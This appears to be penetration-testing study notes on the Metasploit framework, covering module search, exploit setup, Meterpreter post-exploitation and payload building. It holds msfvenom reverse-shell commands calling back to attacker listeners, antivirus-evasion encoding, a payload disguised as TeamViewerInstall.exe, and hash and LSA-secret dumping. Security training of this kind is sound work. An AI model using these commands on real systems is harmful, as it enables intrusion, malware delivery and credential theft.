Metasploit is an automated attack framework developed by Rapid7 that streamlines the process of exploiting vulnerabilities through the use of pre-built modules that contain easy-to-use options to exploit and deliver payloads.

Core Parts

Metasploit contains different parts:

  • Modules are prepared scripts with specific purpose and functions that have already been developed.
    • exploit directory contains POCs and follows the syntax <No.> <type>/<os>/<service>/<name>
    • auxiliary is the scanning, fuzzing, sniffing, etc.
    • exploits exploit a vuln
    • post gather info, pivot, etc.
  • Plugins allow for extra functionality and automation during assessments released by 3rd parties
  • Scripts contain meterpreter functionality and other.
  • Tools are CLI utilities the can be called from the msfconsole
  • Payloads refer to a module that aids the exploit module, usually returning a shell.
  • Encoders help making payloads compatible with different architecture and help with antivirus evasion. msfvenom is responsible for both generating the payload and encoding it.

Start and Search

Start msfconsole, search by service, or narrow results by module type, platform, CVE, rank, and vendor.

# start msf
sudo msf
 
# search within msf
msf6 > search smb
 
# specific search
msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft

Select and Inspect a Module

Use a module, read its info, inspect target options, and review compatible payloads and encoders.

# option selection
msf6 > use 56
 
# module info
msf6 > info
 
# display all vulnerable targets for a specific exploit
msf6 > show targets
 
# show payloads
msf6 > show payloads
 
# search for a specific payload
msf6 > grep meterpreter show payloads
 
# specify and show encoders for pre-exsiting
msf6 > show encoders
 
# examine exploit's options
msf6 exploit(windows/smb/psexec) > options

Configure and Run Exploit

Set required options and run the exploit.

# setting options
set RHOSTS 10.129.180.71
 
# start exploit
msf6 exploit(windows/smb/psexec) > exploit

Meterpreter Post-Exploitation

Meterpreter is metastploit’s built-in shell that features its own command language interpreter. Oftentimes we might want to revert to a typical shell.

Meterpreter is a payload that uses DLL injection to ensure the connection the victim host is stable and difficult to detect using checks. It resides entirely in memory and writes nothing to the disk. It uses entirely encrypted network traffic.

# drop in to a system-level shell
meterpreter > shell
 
# running local exploit suggester
meterpreter > run post/multi/recon/local_exploit_suggester
 
# dump hashes
meterpreter > hashdump
meterpreter > lsa_dump_sam
 
# LSA secrets dump
meterpreter > lsa_dump_secrets

Adding our own exploits

# fiund the directories associate with msf
locate exploits
 
# copy the exploit code into a file and save it into the Github repo
cp <exploit-code> /usr/share/metasploit-framework/modules/exploits/linux/http
 
# loading additional modules
loadpath /usr/share/metasploit-framework/modules/
msf6 > reload_all

Building Payloads

Payloads refer to a module that aids the exploit module, usually returning a shell. There exists different types:

  • Singles contain the exploit and shell code for the selected task. Usually more stable but can also be quite large in size.
  • Stagers work together with Stage payload to perform a task. Stager runs on the victim machine and initiates an outbound connection to the attacker’s listener.
  • Stages are payload components that are downloaded by stager’s modules. For instance like meterpreter.

Staged payloads create a way for us to send over more components of our attack. A payload will send a small stage that will be executed and then call back the attack box to download the remainder of the payload over the network, then executes the shellcode to establish a reverse shell. A stage takes up space in memory which leaves less space for the payload.

Stageless does not have stage, the payload in its entirety is sent across the network. Is sometimes preferred because staged payloads could to unstable shell sessions, and they also transmit less traffic passing over the network to execute the payload.

Running an encoding scheme through multiple iterations can help to evade AV.

Archiving bypasses a lot of common AVs but they will be raised as notifications in the AV alarm due to inability to scan due to being locked with a password.

A packer is an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file.

# build stagless payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
 
# specify encoder
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
 
# running an encoder multiple times
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
 
# check a file for virus total flags
msf-virustotal -k <API key> -f TeamViewerInstall.exe
 
# archiving a file
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a ~/test.rar -p ~/test.js

Databases and Workspaces

PostgreSQL databases are supported in msfconsole that allow to keep track of results. These use Workspaces to organize. They are essentially different folders in a project.

# status
sudo service postgresql status
 
# start
sudo systemctl start postresql
 
# initiate msf db
sudo msfdb init
 
# check status
sudo msfdb status
 
# connect to it
sudo msfdb run
 
# reinitialize (lost password or username)
msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q
 
# access workspace
msf6 > workspace
 
# add a workspace
msf6 > workspace -a Target_1
 
# import nmaop scan results
msf6 > db_import Target.xml 
 
# use nmap inside of msfconsole
msf6 > db_nmap -sV -sS 10.10.10.8
 
# backup data
msf6 > db_export -h
 
# display a DB populated with hosts
msf6 > hosts
 
# view services
msf6 > services
 
# credentials
msf6 > creds
 
# list of owned services and users
msf6 > loot

Plugins

# loading plugins
msf6 > load nessus
 
# see options
msf6 > nessus_help

Sessions

Sessions creates dedicated control interfaces for all of your deployed modules.

# Background a session
msf6 > background
# or [CTRL] + [Z]
 
# list active sessions
msf6 > sessions
 
# open a sessions
msf6 > sessions -i 1

Jobs

Jobs enable us to look at the currently active tasks running in the background and terminate the old ones to free up the port.

msf6 > jobs -h
 
# run an exploit in the context of a job
msf6 > exploit -j 1
 
# list running jobs
msf6 > jobs -l